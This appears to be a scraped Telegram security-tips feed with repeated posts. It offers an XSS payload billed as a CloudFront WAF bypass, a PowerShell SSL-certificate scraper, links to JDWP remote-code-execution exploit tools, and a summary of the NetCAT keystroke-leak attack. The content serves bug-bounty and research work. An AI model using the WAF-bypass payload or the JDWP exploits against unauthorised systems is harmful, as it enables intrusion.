CloudFront ~`XSS´ payload, shake dice.
🎲
<iframe srcdoc=<svg/onload=alert(1)>>
#BugBounty #BugBountyTip #WAF #infosec
🎲
<iframe srcdoc=<svg/onload=alert(1)>>
#BugBounty #BugBountyTip #WAF #infosec
[Script] Get-SSLCertInfo is a basic PowerShell function that can be used to scrape SSL certificate information using IP Ranges, domain lists, etc.
https://raw.githubusercontent.com/NetSPI/PowerShell/master/Get-SSLCertInfo-Scan.psm1
https://raw.githubusercontent.com/NetSPI/PowerShell/master/Get-SSLCertInfo-Scan.psm1
Java Debug Wire Protocol (JDWP) remote code execution #exploitation:
https://blog.csdn.net/caiqiiqi/article/details/83146415
https://github.com/IOActive/jdwp-shellifier
https://packetstormsecurity.com/files/151973/Java-Debug-Wire-Protocol-Remote-Code-Execution.html
https://blog.csdn.net/caiqiiqi/article/details/83146415
https://github.com/IOActive/jdwp-shellifier
https://packetstormsecurity.com/files/151973/Java-Debug-Wire-Protocol-Remote-Code-Execution.html
GitHub
GitHub - IOActive/jdwp-shellifier
Contribute to IOActive/jdwp-shellifier development by creating an account on GitHub.
This media is not supported in your browser
VIEW IN TELEGRAM
[CVE-2019-11184] NetCAT(Network Cache ATtack)
Remotely leaking keystrokes from a victim SSH session
Intel Xeon E5/E7v2 DDIO
Does not require any malicious software
Leak the arrival time of the corresponding packet.
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00290.html
Remotely leaking keystrokes from a victim SSH session
Intel Xeon E5/E7v2 DDIO
Does not require any malicious software
Leak the arrival time of the corresponding packet.
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00290.html